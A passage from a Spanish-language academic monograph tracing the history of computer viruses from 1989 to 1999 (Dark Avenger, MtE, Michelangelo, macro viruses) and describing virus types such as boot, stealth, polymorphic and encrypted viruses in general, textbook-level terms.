estaban infectados por 'Datacrime', pero sí por multitud de versiones de los virus
vigentes en ese momento (Virusprot.com, 2005)65.

Por otro lado el New York Times anuncio el 30 de octubre que las computadoras
de la NASA habían sido interferidas por desconocidos y causando problemas en
el lanzamiento del Atlantis, más de 60 PC´s fueron infectadas esa ocasión y el
intruso se siguió multiplicándose por medio de la red comercial de la NASA con
empresas privadas del dicho país. Se estima que dicho banco de datos
internacionales llegaría a más de medio millón de PC´s infectadas.
(Datacraft, 2005)16.

Este año tan agitado terminó con la distribución de 20.000 copias de un famoso
código malicioso, el Aids Information Diskette, que fueron enviadas por correo a
usuarios que figuraban en bases de datos de diversos organismos, por ejemplo el
PC Business World. Este documento contenía instrucciones de instalación
detalladas que originaban la creación de archivos y directorios ocultos, editando el
contenido de AUTOEXEC.BAT, de modo que uno de estos archivos estaba
presente en cada motor de arranque. El Ttroyano' que contenía encriptaba todos
los archivos del disco duro, otorgándoles los atributos alojados en él. De este

24
incidente es que consiguió otorgar mayor popularidad a los virus, aunque el código
malicioso protagonista del hecho en realidad era un troyano.

Además, un sorprendente número de personas instalaron el software, de tal

manera que PC Business World tuvo que desarrollar un programa para
solucionar los inconvenientes que provocó la distribución de este 'Troyano’
(Virusprot.com, 2005)65.

4.11 AÑO 1990

Surgieron algunas novedades en el panorama de los virus. Mark Washburn había

creado el primer virus polimórfico a partir del 'Viena'. Los virus polimórficos
representaron un paso adelante en la evolución de los códigos malignos, al ser
capaces de encriptar de forma diferente su código cada vez que cometían una
nueva infección; por ello, era necesario desarrollar un algoritmo que pudiera
aplicar tests lógicos al archivo, decidiendo de esta manera si los bytes eran
malignos o no, para crear la herramienta anti-virus que bloqueara dichos códigos.

Aunque Washburn publicó el código de su virus, y se temió que muchos creadores

de virus decidieran crear nuevos códigos a partir de aquel, la invasión de virus
polimórficos no tuvo lugar en el mercado. Además, la mayoría de las empresas del
sector (excepto Virus Bulletin, IBM y pocos más) tampoco fueron capaces de
desarrollar herramientas anti-virus apropiadas, ya que no es tan fácil crear un
algoritmo de desencriptación. No obstante, la idea del polimorfismo se ha utilizado
profusamente después en la creación de 'criaturas víricas' más modernas.

Otra de las consecuencias de los virus polimórficos es el incremento de las falsas

alarmas. Si un vendedor de software anti-virus consigue escribir el software
apropiado para detectar algo con tantas posibilidades de mutación como 'Viena',
existen muchas posibilidades de que en realidad lo que el escáner detecte sea
una línea de código inofensivo. Y una falsa alarma puede ser más engorrosa para
el usuario que un auténtico virus, ya que obliga a poner en funcionamiento
absolutamente todos los mecanismos anti-virus de defensa. Además en 1990 se
vivio una oleada de virus procedentes de Bulgaria, especialmente de aquellos
cuyo autor se identificaba con el alias 'Dark Avenger'.

Los virus 'Dark Avenger' introdujeron dos conceptos nuevos: la infección rápida
(el virus se instalaba en la memoria, y la simple apertura de un archivo provocaba
una infección vertiginosa del disco duro) y el ataque remoto (algunos de estos
virus sobrescribían código cada cierto tiempo, por lo que si el usuario no se daba
cuenta y hacía 'backup' de los datos periódicamente, auto replicaba sin querer
todas las líneas de código maligno). Otros virus clásicos de parecida actuación
durante este periodo fueron 'Number-of-the-Beast' y 'Nomenklatura'.
Sin embargo, 'Dark Avenger' era el más creativo en el proceso de distribución de
sus virus. Cargaba sus códigos malignos en BBS's, infectando los programas anti-

25
virus shareware, y en sus ataques víricos incluía un archivo que cumplía la
función de tranquilizar a todo aquel que comprobara el tamaño del archivo o
realizara un 'checksumming'. Incluso se permitía el lujo de incluir su código
fuente para que los legos pudieran aprender cómo se creaban virus
(Virusprot.com, 2005)66.

En este mismo año tuvo lugar otro evento en Bulgaria: la aparición de la primera
BBS de intercambio de virus. En ella la gente podía descargarse cualquier virus
en el que estuviera interesado, si previamente había dejado algún código maligno
propio para los usuarios de este sistema. Esto, claro está, favoreció tanto la
creación de nuevos virus como la difusión masiva de muchos de ellos.

En la segunda mitad de 1990 hizo su aparición 'The Whale'. Se trataba de un

código muy largo y complejo, que denegaba el servicio al sistema cuando éste se
intentaba poner en marcha. Realmente, se trataba más bien de un ejercicio de
complejidad y ofuscación, un auténtico puzzle para el cazador de virus. En la
práctica, este virus se podía rastrear perfectamente con la mayoría de las
herramientas disponibles en aquel momento, por lo que su fama se debe más a su
complejidad que a sus efectos devastadores.

A finales de este año, los fabricantes de anti-virus se dieron cuenta de que

estaban mucho más organizados, casi hasta alcanzar el nivel que tenían los
mismos creadores de virus. Así, decidieron agruparse en el EICAR ('European
Institute for Computer Anti-virus Research') en Hamburgo, en diciembre de
1990. Esta iniciativa supuso la constitución de un foro muy activo sobre la
amenaza de los virus, en el cual participaban vendedores de software, cazadores
de virus y expertos, con el objeto de intercambiar ideas (y 'especimenes'), así
como animar a las autoridades para la llevar a cabo auténticas estrategias de
defensa contra la incidencia de ataques víricos. Cuando esta organización fue
fundada, se habían catalogado alrededor de 150 virus, y la 'factoría búlgara'
estaba en auténtica ebullición (Virusprot.com, 2005)66.

4.12 AÑO 1991

En Junio de 1991 el Dr. Vesselin Bontchev, que por entonces se desempeñaba

como director del Laboratorio de Virología de la Academia de Ciencias de
Bulgaria, escribió un interesante y polémico artículo en el cual, además de
reconocer a su país como el líder mundial en la producción de virus da a saber
que la primera especie viral búlgara, creada en 1988, fue el resultado de una
mutación del virus Vienna, originario de Austria, que fuera desensamblado y
modificado por estudiantes de la Universidad de Sofía. Al año siguiente los autores
búlgaros de virus, se aburrieron de producir mutaciones y empezaron a desarrollar
sus propias creaciones.
En 1989 su connacional, el virus Dark Avenger o el "vengador de la oscuridad",
se propagó por toda Europa y los Estados Unidos haciéndose terriblemente

26
famoso por su ingeniosa programación, peligrosa y rápida técnica de infección, a
tal punto que se han escrito muchos artículos y hasta más de un libro acerca de
este virus, el mismo que posteriormente inspiró en su propio país la producción
masiva de sistema generadores automáticos de virus, que permiten crearlos sin
necesidad de programarlos (Machado, 2005)38.

El problema de los virus ya era lo suficientemente preocupante como para atraer a

las grandes compañías de marketing. Symantec lanzó a principios de este año el
producto Norton Anti-virus, y Central Point CPAV en abril. Pronto los siguieron
Xtree, Fifth Generation y unos cuantos más. Muchas de estas compañías
reutilizaron los programas de otras empresas (casi todas las israelíes, por
ejemplo). Pero el gran problema de este año fue el llamado 'Glut'. En diciembre de
1990, había alrededor de 100 ó 300 virus. En diciembre del siguiente año, 1000
(ya que en este año se escribieron gran cantidad de virus).

'Glut' quiere decir algo así como 'superabundancia', lo cual, referido al tema de
proliferación de virus, causó la aparición de múltiples y desagradables nuevos
problemas. Los programar tenían muchas limitaciones. En particular, era
necesario el almacenamiento de gran cantidad de datos en memoria para
proceder a un escaneo en busca de virus, y bajo DOS sólo había disponibles 640
Kb utilizables. Otro problema es que algunos escáneres eran demasiado lentos,
en proporción al gran número de virus que debían detectar. Además, el análisis de
virus requiere no sólo su detección real, sino su desinfección efectiva. Si cada día
hubiera que proceder al análisis de un nuevo virus, solamente se podrían detectar,
analizar y desinfectar unos 250 por año. Eso quiere decir que más virus significa
también más trabajo para los desarrolladores.

El 'Tequila' fue el primer virus polimórfico difundido a escala mundial. En mayo,

los nuevos motores de búsqueda lo detectaban, pero no fue hasta septiembre que
se empezó a reducir su expansión.
Si no se desinfectaba totalmente existía un riesgo de pérdida de un 1 por ciento de
los archivos, y esto se incrementaba cada vez que se detectaba el virus pero no
se desinfectaba de forma efectiva.

Al igual que la corriente búlgara, en 1991 apareció en el Perú el primer virus local,
autodenominado Mensaje y que no era otra cosa que una simple mutación del
virus Jerusalem-B y al que su autor le agregó una ventana con su nombre y
número telefónico. Los virus con apellidos como Espejo, Martínez y Aguilar fueron
variantes del Jerusalem-B y prácticamente se difundieron a nivel nacional en el
Perú (Virusprot.com, 2005)67.

4.13 AÑO 1992

27
Fue el año de la aparición de la Self Mutating Engine (MtE) de Dark Avenger.
En principio, la comunidad mundial pensó que se trataba de un nuevo virus, de
nombre 'Dedicated', pero después hizo aparición la MtE. MtE es un archivo OBJ,
con el código fuente de un simple virus e instrucciones para enlazar el archivo
OBJ a un virus, de tal manera que, al final, se podía obtener un virus polimórfico.
Inmediatamente, los "cazadores" de virus se pusieron a la tarea de desarrollar
detectores para la MtE. En un principio, se creyó que habría cientos y cientos de
virus haciendo uso de MtE, ya que era muy fácil de usar y permitía a dichos virus
ocultarse de forma extraordinaria. Pero los creadores de virus se dieron cuenta
rápidamente de que un escáner que fuera capaz de detectar un MtE podía
detectar todos (Virusprot.com, 2005)68.

A la MtE le siguió 'Commander Bomber', también de 'Dark Avenger'. Antes de

'Commander', uno podía prever fácilmente en qué archivo estaba oculto un virus.
Muchos desarrolladores de productos aprovechaban esta facilidad para crear
rápidamente herramientas anti-virus. Pero 'Commander Bomber' cambió esto, de
tal manera que los escáneres se veían obligados a chequear todos los archivos, o
bien localizar el virus mediante un seguimiento completo del código.

Otro virus importante que surgió durante este periodo fue 'Starship'. Se trata de
un virus completamente polimórfico, que constaba de una serie de trucos anti-
debbuging y anti-checksumming. Los programas de 'checksumming' sirven
para detectar un virus en función de que posee código ejecutable que muta para
replicarse. 'Starship' solamente infectaba los archivos cuando éstos eran
copiados desde el disco duro al diskette. Por lo tanto, los archivos residentes en
el disco duro no cambiaban nunca. Pero la copia del diskette estaba infectada,
por lo que si este diskette se introducía en otro equipo y se chequeaba el sistema
por medio del 'checksummer', éste lo aceptaba sin problemas. El virus 'Starship'
se instalaba a sí mismo en el disco duro, pero sin hacer ningún cambio en el
código ejecutable. Cambiaba los datos, eso sí, de partición, efectuando una nueva
partición en el 'boot'.
Esta nueva partición contenía el código del virus, que se ejecutaba antes de pasar
el control a la partición 'boot' original. Probablemente, el virus más importante
durante 1992 fue el conocido 'Michelangelo'. Uno de los más conocidos
vendedores de productos anti-virus norteamericano dio la alerta: cerca de cinco
millones de PCs podían venirse abajo el 6 de marzo de este año. En muchas
empresas cundió el pánico, cuando los medios de comunicación se hicieron eco
de este asunto. Sin embargo, el 6 de marzo sólo tuvieron problemas entre 5.000 y
10.000 equipos informáticos, y naturalmente los vendedores de software tuvieron
que moderar el ímpetu de sus avisos de alarma. Probablemente, nunca se llegara
a saber cuánta gente, en realidad, se vio afectada por 'Michelangelo', pero lo
cierto es que en los días previos al 6 de marzo la mayoría de los usuarios llevaron
a cabo exhaustivos exámenes de sus equipos en pos del virus.
Después de esta fecha, muchos expertos en virus de todo el mundo vieron como
sus opiniones, siempre tenidas en cuenta, eran objeto del más absoluto desprecio.

28
En agosto del presente año surgen los primeros paquetes de virus de autor.
Primero apareció el VCL ('Virus Creation Laboratory'), de 'Nowhere Man', y a
continuación 'Dark Angel' generó el 'Phalcon/Skism Mass-Producer Code
Generator'. Estos paquetes hicieron posible que cualquier persona pudiera hacer
uso de un PC para escribir su virus personal. En el transcurso de un año,
aparecieron, en consecuencia, docenas de nuevos virus en el mercado, todos
ellos creados mediante el uso de estas herramientas (Virusprot.com, 2005)68.

A finales de 1992 un nuevo grupo de creadores de virus, ARCV (Asociación de

Virus Auténticamente Crueles) apareció en el Reino Unido, y al cabo de un par de
meses, la Unidad de Crimen Computacional de Scotland Yard los localizó y
arrestó, gracias a la inestimable ayuda de la comunidad de expertos en soluciones
anti-virus. El efímero florecimiento de la ARCV duró sólo tres meses, durante los
cuales crearon unas cuantas docenas de nuevos virus y reclutaron a algunos
miembros para su causa particular.

Otro de los hechos destacables en este año tan movido fue la aparición de
personas que se dedicaban a la venta de colecciones de virus. Para ser más
precisos, se trataba realmente de colecciones de archivos, algunos de los cuales
eran virus. En los Estados Unidos, John Buchanan ofreció su colección de unos
cuantos miles de códigos al precio de 100 dólares por copia, y en Europa, la
Unidad Clínica de Virus sacó a la venta varias colecciones por 25 dólares la copia
(Virusprot.com, 2005)68.

4.14 AÑO 1993

En 1993 empezaron a crearse y diseminarse especies nacionales desarrolladas

con creatividad propia, siendo alguno de ellos sumamente originales, como los
virus Katia, Rogue o F03241 y los polimórficos Rogue II y Please Wait (que
formateaba el disco duro). La creación de los virus locales ocurre en cualquier
país.

XTREE anunció que iban a abandonar el negocio del software anti-virus. Era la
primera gran compañía que renunciaba a la lucha. Casi al mismo tiempo, un
nuevo grupo de creadores de virus hizo su aparición en Holanda: su nombre,
'Trident'. El principal creador de virus de este grupo, Masouf Khafir, elaboró una
máquina polimórfica denominada, precisamente, 'Trident Polymorfic Engine', y
lanzó un virus que la utilizaba llamado 'GIRAFE'. A esto, le siguieron varias
nuevas versiones de TPE. Este virus es mucho más difícil de detectar que el MtE,
y mucho más difícil de evitar sus falsas alarmas.

Khafir también lanzó el primer virus que trabajaba de acuerdo con un principio que
ya fue enunciado por Fred Cohen. El virus 'Cruncher' era un código maligno de
compresión que automáticamente se incluía en archivos para autoinstalarse en

29
tantos equipos como fuera posible. Mientras tanto, 'Nowhere Man' y el grupo
'Nuke' había estado, también, bastante ocupados.

A principios de este mismo año, fue lanzado el Nuke Encryption Device (NED).
Se trataba de otro mutador mucho más difícil de neutralizar que MtE. El virus
consiguiente, 'Itshard', pronto siguió a la aparición de esta nueva máquina
polimórfica. También 'Dark Angel' quiso apuntarse a la moda del polimorfismo.
Este creador de virus lanzó DAME ('Dark Angel's Multiple Encryptor Device
(NED)'). Se trataba de otro mutador cuyo virus era 'Trigger'. Este código relanzó la
versión 1.4 de TPE (de nuevo, era mucho más complejo y difícil de erradicar que
en las versiones previas), y lanzó un virus llamado 'Bosnia' que lo utilizaba
(Virusprot.com, 2005)69.

Un poco después de esta oleada de códigos polimórficos, Lucifer Messiah, de

Anarkick Systems, había tomado la versión 1.4 de TPE y escrito un virus llamado
'POETCODE', utilizando una versión modificada de esta máquina (la 1.4b).

Pero el más famoso de los polimórficos que aparecieron a principios de 1993 fue
'Tremor', el cual ascendió rápidamente a las alturas de la fama cuando fue
difundido a través de un show de la televisión alemana dedicado precisamente a
las novedades del software. El archivo infectado fue PKUNZIP.EXE, que la
mayoría de los recipientes usaban para descomprimir los archivos que recibía.

También en este año, desaparecieron muchas importantes empresas

desarrolladoras de software anti-virus, como Certus (uno de cuyos productos más
representativos era Novi) ó Fifth Generation (creadores del producto
'Untouchable'). No obstante, también hubo algunas buenas noticias: la empresa
S&S International recibió el galardón 'Queen's Award for Technological
Achievement'. Este premio se otorgó por el lenguaje de descripción de virus
VIRTRAN, que es la base fundamental de FindVirus y VirusGuard
(Virusprot.com, 2005)69.

4.15 AÑO 1995

A mediados de 1995 se reportaron en diversas ciudades del mundo la aparición de

una nueva familia de virus que no solamente infectaban documentos, sino que a
su vez, sin ser archivos ejecutables podían auto-copiarse infectando a otros
documentos. Los llamados macro virus tan sólo infectaban a los archivos de MS-
Word, posteriormente apareció una especie que atacaba al Ami Pro, ambos
procesadores de textos.

En 1997 se disemina a través de Internet el primer macro virus que infecta hojas
de cálculo de MS-Excel, denominado Laroux, y en 1998 surge otra especie de
esta misma familia de virus que ataca a los archivos de bases de datos de MS-
Access (Udec, 2005)62.

30
4.16 AÑO 1999

A principios de 1999 se empezaron a propagar masivamente en Internet los virus

anexados (adjuntos) a mensajes de correo, como el Melisa o el macro virus
Papa. Ese mismo año fue difundido a través de Internet el peligroso CIH y el
ExploreZip, entre otros muchos más.

A fines de Noviembre de este mismo año apareció el Bubbleboy, primer virus que
infecta los sistemas con tan sólo leer el mensaje de correo, el mismo que se
muestra en formato HTML. En Junio del 2000 se reportó el VBS/Stages.SHS,
primer virus oculto dentro del shell de la extensión .SHS (Udec, 2005)62.

4.17 QUE ES UN VIRUS INFORMÁTICO

Los virus informáticos son programas, estos contienen instrucciones que puede
ejecutar cualquier ordenador, no contienen información del autor ni fecha de
creación, son pequeños en tamaño, y tienen la capacidad de tomar el control
sobre otros programas. Se añaden a cualquier tipo de archivo de tal forma que
cuando estos se ejecutan, el virus también lo hace, causando dificultades en el
debido funcionamiento del ordenador y pueden dañar la información que se tiene
almacenada, registra, y hacen lento el trabajo del equipo.

Están hechos para reproducirse en los computadores a los cuales infectan y a

través de estos propagarse, por medio de la copia de archivos, envío de mensajes
en la lista de correo, o a través de la red, son programas de difusión rápida, no
todos los virus destruyen ni tienen el mismo funcionamiento, y algunas veces se
dan a conocer al usuario por medio de mensajes, o simplemente pasan a eliminar
información del equipo.

4.17.1 Otras definiciones. El primer autor oficial de los virus, Fred B. Cohen,
quien en 1994 escribió su tesis doctoral acerca de los virus, definiéndolos como
«un programa de ordenador que puede infectar otros programas modificándolos
para incluir una copia de sí mismo» (Wikipedia, 2005)71.

Un virus es un código informático que se adjunta a un programa o archivo, de

forma que puede pasar de equipo a equipo, realizando ataques mientras se
desplaza. Los virus pueden dañar el software, el hardware y los archivos. Virus
(n.) Código creado expresamente para su replicación. Los virus intentan pasar de
equipo a equipo adjuntándose a un programa "anfitrión". Pueden dañar software,
hardware o información.
Al igual que los virus humanos, que tienen distintos grados de gravedad desde el
Ébola a la gripe de 24 horas, los virus informáticos varían desde los ligeramente
molestos hasta los altamente destructivos. La buena noticia es que un virus de

31
verdad no se extiende a menos que se realice una acción, como compartir un
archivo o enviar un mensaje de correo electrónico (Microsoft, 2005)42.

4.18 QUE PUEDE HACER UN VIRUS

Un virus es un programa, y un estos puede hacer lo que el sistema operativo

les permita hacer, ya sea porque esté autorizado a hacerlo, ó porque hay un fallo
de seguridad que el programa explota. En general puede desde no hacer nada
más que replicarse, a borrar información vital del sistema como el disco duro o la
BIOS ó robar información personal, además de claves. Puede hacer cualquier
cosa que un programa con sus privilegios pueda hacer en el ordenador que lo
ejecuta (Google, 2005)29.

4.19 CÓMO SE ADQUIERE UN VIRUS

La forma más común en que se transmiten los virus es por diskette, descarga
o ejecución de archivos adjuntos a e-mails. También se pueden encontrar virus
simplemente visitando ciertos tipos de páginas Web que utilizan un componente
llamado ActiveX o Java Applet. Además, se puede llegar a ser infectado por un
virus simplemente leyendo un e-mail dentro de ciertos tipos de programas de e-
mail como Outlook, Outlook Express, Netscape mail o Eudora Pro (Alerta
Virus, 2005)4.

4.20 QUÉ HACEN LOS VIRUS

Cuando un virus lleva a cabo la acción para la que había sido creado, se dice que
se ejecuta la carga (payload). Cuando se inicia la carga, la mayoría de los virus
son inofensivos, y no hacen más que mostrar mensajes de diferentes tipos. Otros
pueden ser bastante maliciosos por naturaleza e intentan producir un daño
irreparable al ordenador causando daños a los archivos
desplazando/sobrescribiendo el sector de arranque principal (master boot record
- MBR), borrando los contenidos del disco duro o incluso escribiendo sobre la
BIOS, dejándolo inutilizable. La mayoría de los virus no tenderán a borrar todos
los ficheros del disco duro. La razón de esto es que una vez que el disco duro se
borra, se eliminará el virus, terminando así el problema (Alerta Virus, 2005)4.

4.21 LAS NUEVAS INCURSIONES DE LOS VIRUS

En la actualidad se vive un auge por la tecnología, los desarrolladores de virus

encuentran nuevas oportunidades en sistemas diferentes a los ordenadores, a los
cuales pueden atacar, es el caso de los celulares, y agendas electrónicas, donde
los virus aprovechan el uso del entorno multimedia con el que cuentan estos
aparatos, junto con los medios GPRS y la tecnología inalámbrica Bluetooth del
móvil. Tal es el caso del virus “cabir” el cual envía un mensaje de texto al celular
solicitando la descarga de un programa cuando el usuario accede a la descarga el

32
virus queda instalado y comienza a enviar mensajes de texto continuamente hasta
agotar la batería, ya que este utiliza la agenda de teléfonos almacenada en el
celular, aparte aprovecha el uso de tecnologías como GPRS y Bluetooth donde
emite el mensaje a quien se encuentre cerca a una distancia no mayor de 10
metros.

Las agendas electrónicas las cuales poseen un buen manejo del multimedia
también son victimas de estos programas ya que algunas manejan sistemas
operativos basados en Windows y son aprovechados para propagar programas
que hagan estragos en estos sistemas, por lo tanto cada tecnología que ofrezca
interoperabilidad con nuestro alrededor esta propenso a ser victima de algún
ataque vírico por parte de los desarrolladores de código malicioso ya que
aprovechan la comunicación que estos pueden ofrecer con otros medios.

5. TEORÍA Y FUNCIONALIDAD DE LOS VIRUS

33
5.1 QUIEN HACE LOS VIRUS

Los virus informáticos están hechos por personas con conocimientos en

programación pero no son necesariamente son genios de las computadoras,
tienen conocimientos de lenguaje ensamblador y de cómo funciona internamente
el ordenador. No surgen de la nada, y son de menor dificultad cuando se trata de
programar un software para facturación por ejemplo. Además no tienen mucho
que ver con los virus biológicos excepto por algunas características de estos,
entre ellas el nombre y la capacidad de infectar a su huésped. Algunos
programadores de virus hacen que su creación simule los efectos de un virus
biológico, pero ahí acaba la similitud (Google, 2005)29.

En un principio estos programas eran diseñados casi exclusivamente por los

hackers y crackers que tenían su auge en los Estados Unidos y que hacían
temblar a las compañías con solo pensar en sus actividades. Tal vez estas
personas lo hacían con la necesidad de demostrar su creatividad y su dominio de
las computadoras, por diversión o como una forma de manifestar su repudio a la
sociedad que los oprimía. Hoy en día, resultan un buen medio para el sabotaje
corporativo, espionaje industrial y daños a material de una empresa en particular
(Monografías, 2005)43.

El porque de crear virus, solamente quien los hace lo sabe con certeza. Algunos
virus se crean por el desafío tecnológico de crear una amenaza que sea única, no
detectable, o simplemente devastadora para su víctima. Sin embargo, es discutible
que la mayoría de las personas crean virus por vanidad. El creador espera que el
virus se propague de tal manera que le haga famoso. La notoriedad aumenta
cuando el virus es considerado una amenaza donde los fabricantes de antivirus
tienen que diseñar una solución (Alerta virus, 2005)4.

En los últimos años, el área informática ha experimentado un vertiginoso

crecimiento, y con esto, los programas que las compañías distribuyen alcanzan
con mayor rapidez el periodo de madurez. Hace algunos años, los usuarios
comenzaron a grabar los programas, debido al alto precio de éstos, lo que llevó a
los programadores de virus a encontrar el principal modo de distribución.
Podemos, por otro lado, enunciar otras fuentes de desarrollo de los virus como
son las redes, el freeware y shareware, las BBS, y la aparición de programas
sencillos de creación de virus (Hernández, 2000)2.

5.2 PROPIEDADES DE LOS VIRUS

34
La característica principal de estos programas es su facultad de duplicación,
existen otras particularidades de los virus, como son las siguientes:

- Modifican el código ejecutable: aquí aparece el adjetivo “contagio”. Para que un

virus infecte a otros programas ejecutables, debe ser capaz de alterar la
organización del código del programa que va a infectar. Permanecen en la
memoria de la computadora: cuando un usuario, inocente de las consecuencias,
ejecuta en su computadora un prográma con virus, éste se acomoda en la
memoria RAM, con objeto de adueñarse de la computadora, y por así decirlo,
tomar el mando.

- Se ejecutan involuntariamente: un virus sin ejecutar es imposible que dañe una

computadora. En ese momento está en reposo, en modo de espera, necesitando
de alguien que ejecute el programa “portador”. Funcionan igual que cualquier
programa: un virus, al ser un programa de computadora, se comporta como tal, en
ese sentido necesita de alguien que lo ponga en funcionamiento, si no, es
software que estará solamente almacenado en un dispositivo magnético.

- Es nocivo para la computadora: esto depende del virus con el que se trate, se
pueden encontrar programas que destruyen parcial o totalmente la información, o
bien programas que tan solo presentan un mensaje continuo en pantalla, el cual
aunque no hace daño al final es muy molesto. Se ocultan al usuario: claramente,
el programador del virus desea que el usuario no lo advierta durante el máximo
tiempo posible, hasta que aparece la señal de alarma en la computadora.
Conforme pasa el tiempo, los virus van generando más y mejores técnicas de
ocultamiento, pero también se van desarrollando los programas antivirus y de
localización (Hernández, 2000)1.

5.3 TIPOS DE VIRUS

Generalmente hay dos clases principales de virus. Los que infectan archivos, y los
que infectan el sector de arranque. Los que infectan archivos se adhieren a
programas normales, usualmente infectan cualquier COM y/o EXE, aunque
algunos pueden infectar cualquier programa que se ejecute o interprete, como
archivos SYS, OVL, OBJ, PRG, MNU y BAT. Hay al menos un virus para PC que
infecta archivos fuente insertando código en archivos, que reproduce la función
del virus en cualquier ejecutable generado a partir de los archivos fuente
infectados.

Los que infectan archivos pueden ser de acción directa o se encuentran

residentes, un virus de acción directa selecciona uno o más programas a
infectar cada vez que el programa corrupto se ejecuta, un ejemplo de esto es el
virus Vienna el funciona de este modo (Google, 2005)29.
También se denominan no residentes. La mayoría de los virus son residentes, un
virus residente se instala en memoria (RAM) la primera vez que un programa

35
infectado se ejecuta, y a partir de ahí infecta a otros programas cuando son
ejecutados, como es el caso del virus Jerusalem o simplemente cuando se dan
otras condiciones (Google, 2005)29.

Los virus que infectan las rutinas de arranque se propagan en determinadas

zonas del sistema encargadas del proceso de inicialización. En los PC hay virus
de arranque ordinarios, que infectan sólo el sector de arranque de DOS, y los
que infectan el MBR (Master Boot Record) de los discos duros y diskettes.
Todos los virus de arranque son residentes.

Hay unos pocos virus que pueden infectar tanto a archivos como rutinas de
arranque, como por ejemplo el virus Tequila, y que se denominan "multi-partita" o
también de archivo y arranque. Aparte de la clasificación anterior, muchos
expertos en virus distinguen alguna o ambas de las distintas clases de virus:

- Virus de cluster o del sistema de archivos, son aquellos que modifican la tabla de
las entradas de los directorios de forma que el virus es cargado y ejecutado antes
que el programa original, que no es físicamente alterado, sino sólo su información
del directorio. Hay quienes consideran estos como una tercera categoría de virus,
mientras que otros piensan que son una subcategoría de los que infectan
archivos.

- Los virus del núcleo o kernel, que aprovechan las particularidades de los
programas que forman el sistema operativo, un virus que infecta archivos y puede
infectar programas del núcleo no es un virus del núcleo. Este término se reserva
para describir virus que usan alguna particularidad de los archivos del núcleo,
como su ubicación física en disco o la forma de carga o llamada (Google, 2005)29.

5.3.1 Virus Macros. Los virus de Macro están más elaborados y son virus
escritos a partir del macro-lenguaje de una aplicación determinada. Por ejemplo
podemos citar el Word, procesador de textos. Estos virus, son realmente dañinos,
porque son capaces de borrar un texto, dado que los bloques macro son diminutos
programas del propio Word, por ejemplo, que permite ejecutar varias funciones
seguidas o a la vez con solo activar la casilla.

Los virus macros se restringen a los usuarios de Word, tiene una importante
propagación ya que puede infectar cualquier texto, independientemente de la
plataforma bajo la que éste se ejecute: Mac, Windows 3.x, Windows NT, W9.x,
WXp y OS/2. Este es el motivo de su peligrosidad, ya que el intercambio de
documentos en disquete, CDS o por red es mucho más común que el de
ejecutables.

Por ello un Macro programado con la instrucción deshacer, resultara en un gran

daño. Otros sin embargo, podrán resultar inofensivos, dado que son programados

36
con funciones de copiar y pegar por ejemplo, no se pierden datos, pero si resulta
algo bastante molesto (Hernández, 2005)31.

En el caso de Acces, esto se complica, ya que este programa permite además de

códigos Macro, programar scripts. Los scripts son invocados según unas
determinadas funciones, por ejemplo la tecla ‘A’ pulsada tres veces ocasiona la
ejecución de un Macro. Por otro lado, eliminar los virus o scripts malintencionados
puede resultar una tarea bastante compleja, Debido a que reemplazar o desactivar
no solo los comandos Macros si no también los scripts. Puede causar que
algunas funciones básicas del programa dejen de funcionar (Hernández, 2005)31.

5.3.2 Virus que infectan rápido/lento (Fast/Slow). Un virus que infecta archivos
(como el Jerusalem), se copia a memoria cuando un programa infectado por él
es ejecutado, y a partir de ahí se propaga a otros programas cuando son
ejecutados. Un virus que infecta rápidamente es el que, cuando está activo en
memoria, infecta no sólo los programas que se ejecutan, sino incluso los que
simplemente son abiertos.

El resultado es que si tal virus está en memoria, ejecutando un antivirus o un

comprobador de integridad puede llevar a infectar a todos, o al menos muchos
programas, como los virus Dark Avenger y Frodo. Un virus que infecta
lentamente es el que sólo infecta programas cuando son modificados ó creados,
el propósito es engañar a quienes usan comprobadores de integridad,
haciéndoles creer que las modificaciones son debidas exclusivamente a razones
legítimas (Google, 2005)29.

5.3.3 Virus que infectan esporádicamente (Sparse). Un virus que infectan

esporádicamente es el que no infecta siempre, sino sólo de vez en cuando, como
una de cada diez veces que se ejecuta un programa, o sólo archivos que tienen
un tamaño dentro de unos márgenes determinados, etc. No infectando a menudo,
estos virus intentan minimizar la probabilidad de ser descubiertos (Google,
2005)29.

5.3.4 Virus furtivo ó Stealth. Un virus furtivo es el que, mientras está activo,
oculta las modificaciones que ha hecho a archivos o zonas de arranque. Esto
normalmente se hace supervisando las llamadas a las funciones del sistema que
se usan para leer archivos o sectores del medio de almacenamiento y
manipulando los resultados. Esto significa que los programas que intentan leer
archivos o sectores contaminados sólo ven los datos originales en lugar de los
que están infectados realmente.

Las modificaciones hechas por el virus pueden pasar inadvertidas para los
programas antivirus. No obstante, para hacer esto el virus debe estar residente en

37
memoria cuando el programa antivirus se ejecuta, y esto sí puede ser detectado.
Como un ejemplo esta el primer virus de DOS, Brain, que infecta el sector de
arranque, supervisa las entradas/salidas del disco y redireccióna cualquier intento
de leer un sector infectado por él, al área del disco donde el sector original está
almacenado (Google, 2005)29.

5.3.5 Virus polimórfico. Un virus polimórfico es el que produce copias

distintas pero operacionales de sí mismo, esta estrategia ha sido usada con la
esperanza de que los antivirus no sean capaces de detectar todas las
variaciones del virus, una técnica para hacer virus polimórficos es seleccionar
entre distintos métodos de cifrado con distintas rutinas de descifrado, sólo una de
esas rutinas estará en claro en cualquier forma del virus.

Un antivirus basado en cadenas, necesitará una cadena por cada método de

descifrado para identificar eficazmente un virus de este tipo, los virus polimórficos
más elaborados, como el V2P6 varían las secuencias de instrucciones en sus
variaciones intercalando en las rutinas de descifrado instrucciones sin ningún
efecto neto, (como NOP, o instrucciones que operen sobre registros que no se
están usando). También intercambiando el orden de instrucciones independientes,
o incluso usando secuencias de instrucciones distintas que tengan el mismo
resultado (como Resta A de A, y Carga 0 en A).

Para identificar efectivamente todas las variantes de este tipo de virus, el antivirus
tiene que disponer de unas rutinas específicamente construidas tras un análisis
detallado del virus. Una de las formas más elaboradas de polimorfismo usada
hasta ahora es el "Mutation Engine" (MtE) que viene en forma de código objeto.
Con el "Mutation Engine" cualquier virus puede hacerse polimórfico añadiendo
ciertas llamadas en su código fuente y enlazándolo con los módulos generadores
de números aleatorios de "Mutation-Engine". La llegada de los virus polimórficos
conlleva una tarea cada vez más complicada y cara para la búsqueda de virus.
Añadiendo más y más cadenas a los antivirus, simplemente no funcionará
adecuadamente con estos virus (Google, 2005)29.

5.3.6 Virus cifrado (Encrypted). Un virus cifrado es aquel que usa métodos
criptográficos, en un intento de esquivar los antivirus basados en cadenas de
búsqueda, es el autocifrado con una clave variable. Estos virus como el Cascade,
no se denominan polimórficos, ya que su código descifrado es invariable.

La rutina de descifrado se puede usar como una cadena de búsqueda para los
